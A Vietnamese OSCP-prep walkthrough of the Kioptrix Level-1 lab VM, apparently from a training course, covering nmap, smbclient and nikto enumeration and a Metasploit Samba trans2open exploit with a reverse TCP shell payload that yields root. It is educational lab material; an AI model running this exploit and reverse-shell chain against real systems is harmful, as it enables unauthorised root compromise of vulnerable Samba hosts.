OSCP : Hack The Kioptrix Level-1

OSCP VN Online Course

CTF VM Kioptrix này là một thách thức khá dễ dàng. Mục tiêu của bài tập là giành quyền truy cập root thông qua bất kỳ vector attack nào có thể . Mục đích của bài tập là rèn luyện các “ngón nghề” cơ bản như nmap, nikto hay sử dụng metasploit trong đánh giá và khai thác lỗ hổng.

Và theo các chuyên gia cũng như nhiều người đã thi OSCP thì các bài thực hành với lab tương tự như Kioptrix hay có trong bài thi, vì vậy hãy làm Full lab nghĩ là làm từ đầu đến cuối tất cả lab liên quan đến Kioptrix.

Hãy tải Kioptrix tại đây và mở trong VM.

Nội Dung Bài Học

  • Network scaning
  • Enumeration
  • Exploitation
  • Root access

Bắt đầu !!

Hãy chạy OSCP Pentest Lab và quét dò các máy tính trên mạng với công cụ thông dụng là netdiscover,chúng ta có thể dùng nmap nhưng tôi thích netdiscover và để luyện tập cho bài thi OSCP thì cứ vận dụng cái nào mình thông thạo, nhuần nhuyễn mà không vi phạm chính sách …

Trong mô hình lab này ta thấy địa chỉ của mục tiêu là 192.168.1.109 do thông tin MAC Vendor là VMware, Inc.

  • Hãy ghi chú lạ địa chỉ này trong sheet hay note của bạn, ta nên chuẩn bị sẳn các form này để khi thi có thể ghi chú và áp dụng cho nhanh chóng. Đây là những tham số mà ta sẽ chuyển chúng cho NMAP xử lý với aggressive scan.
  • Chú ý : Hãy xem kỹ lại các tùy chọn của NMAP và “vọc” thật nhiều, cho nó thành 1 skill thực tiễn.

Tiến hành nmap scan trong “giận dữ” với tùy chọn -A , tùy chọn này có tác dụng gì các bạn hãy gởi đáp án hay comment trên Group, điều này quan trọng vì nó giúp cho chúng ta ghi nhớ thật kỹ.

#nmap -A 192.168.1.109

Chú ý sẽ thấy các port đang open là 22/80/111/139/443/. Cần ghi nhớ và biết những port nào là của dịch vụ nào, và nên chú ý vào các port “nhạy cảm” như 80. Rõ ràng là có 1 web server đang chạy, nhưng nhiều khi vào hay scan sẽ chẳng thấy gì cả và trong đầu chúng ta hãy liên tưởng đến một loạt công cụ để pentest port này như nikto, whatweb, wpscan, joomscan và dirbuster hay các tool thông dụng của mục Web Pentest trong danh sách Kali Tool List, nhưng quan trọng là phải thực hành cho nhiều vì OSCP là bài thi thiên về lab … Hãy ghi chú những thông số này trong Sổ Ghi Chú thật kỹ, đây là những bài học mà khóa OWASP Web Hacking đã trình bày khá đầy đủ.

Với các port 139 thì thử ngay hack dịch vụ samba, trong khá nhiều bài thực hành ta đã sử dụng samba trên Metasploit và hack khá dễ nếu có lỗi, sau đó còn dump cả hack của mục tiêu Metasploitable 2.

  • Và ghi nhớ #smbclient -L //192.168.1.109 để tiến hành enum dịch vụ này. Mục tiêu của bài này không phải là khai thác thành công vì nó quá dễ, mà là sử dụng các công cụ liên quan cho nhuần nhuyễn cũng như tốt độ “tư duy” để lựa chọn công cụ và phương án tấn công. Và quan trọng, nếu attack thất bại cũng đừng lo lắng, sẽ còn nhiều hướng khác và cùng lắm là thi lại ! Đừng có sợ thi lại nếu không sẽ thi lại thật sự đấy các bạn ………….

Bây giờ ta sẽ dùng nikto để dò xem

#nikto -h http://192.168.1.109

Ta thấy có khá nhiều thông tin lỗi, hãy đọc từng dòng một cách nhanh chóng, và phải hiểu ý nghĩa của nó, chú ý các OSVDB và những thông báo có chữ vulnerable.

Tiếp theo, chúng ta sẽ khai thác dịch vụ Samba xem sao , có lỗi buffer overflow trong Samba versions 2.2.0 đến 2.2.8.Các bạn nên quét kỹ hơn với NMAP để service fingerpringting nhằm xác định phiên bản qua tùy chọn -sS.

use exploit/linux/samba/trans2open
msf exploit(linux/samba/trans2open) > set rhost 192.168.1.109
msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
msf exploit(linux/samba/trans2open) > set lhost 192.168.1.107
msf exploit(linux/samba/trans2open) > exploit

Quá may, ta đã khai thác thành công và có 1 reverse tpc shell với quyền root, coi như xong.

whoami => root

Như vậy, ta đã thành công nhưng các bạn hãy giải câu hỏi sau đây : Hãy thay thế phương án hack bằng Metasploit với một kịch bản (script) nhẹ nhàng hơn như mã khai thác tải về từ exploit-db xem sao .

Demo

Và nên lưu trữ sẳn kho mã khai thác này để khi thi lấy ra sử dụng cho nhanh chóng.

Hãy bắt tay vào thực hành ngay các bạn.

Chương trình đào tạo OSCP VN Online tại đây nếu muốn đăng kí học Full & chi tiết …

Comments